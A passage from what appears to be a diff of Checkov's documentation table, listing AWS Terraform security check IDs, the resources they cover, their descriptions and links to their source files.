from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) |
+| 506 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) |
+| 507 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) |
+| 508 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) |
+| 509 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) |
+| 510 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) |
+| 511 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | 
[LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) |
+| 512 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) |
+| 513 | CKV_AWS_366 | resource | aws_cognito_identity_pool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Terraform | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py) |
+| 514 | CKV_AWS_367 | resource | aws_sagemaker_data_quality_job_definition | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts | Terraform | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py) |
+| 515 | CKV_AWS_368 | resource | aws_sagemaker_data_quality_job_definition | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume | Terraform | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py) |
+| 516 | CKV_AWS_369 | resource | aws_sagemaker_data_quality_job_definition | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs | Terraform | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py) |
+| 517 | CKV_AWS_370 | resource | aws_sagemaker_model | Ensure Amazon SageMaker model uses network 
isolation | Terraform | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py) | +| 518 | CKV_AWS_371 | resource | aws_sagemaker_notebook_instance | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2 | Terraform | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py) | +| 519 | CKV_AWS_372 | resource | aws_sagemaker_flow_definition | Ensure Amazon SageMaker Flow Definition uses KMS for output configurations | Terraform | [SagemakerFlowDefinitionUsesKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py) | +| 520 | CKV_AWS_373 | resource | aws_bedrockagent_agent | Ensure Bedrock Agent is encrypted with a CMK | Terraform | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py) | +| 521 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | +| 522 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | +| 523 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | +| 524 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached 
to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | +| 525 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | +| 526 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | +| 527 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | +| 528 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | +| 529 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | +| 530 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | +| 531 | CKV2_AWS_6 | resource | 
aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | +| 532 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | +| 533 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | +| 534 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | +| 535 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | +| 536 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | +| 537 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | +| 538 | CKV2_AWS_12 | resource | aws_default_security_group 
| Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | +| 539 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | +| 540 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | +| 541 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | +| 542 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 543 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 544 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. 
| Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | +| 545 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | +| 546 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | +| 547 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | +| 548 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | +| 549 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | +| 550 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 551 | CKV2_AWS_20 | 
resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 552 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 553 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | +| 554 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | +| 555 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | +| 556 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | +| 557 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | +| 558 | CKV2_AWS_27 | 
resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | +| 559 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | +| 560 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | +| 561 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | +| 562 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | +| 563 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | +| 564 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | +| 565 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 
has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | +| 566 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | +| 567 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | +| 568 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | +| 569 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 570 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | +| 571 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 572 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM 
secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | +| 573 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 574 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 575 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 576 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 577 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 578 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 579 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 580 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 581 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 582 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 583 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 584 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 585 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 586 | 
CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 587 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 588 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 589 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 590 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 591 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 592 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 593 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 594 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 595 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 596 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 597 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 598 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 599 | CKV2_AWS_37 | resource | 
aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 600 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 601 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 602 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 603 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 604 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 605 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | 
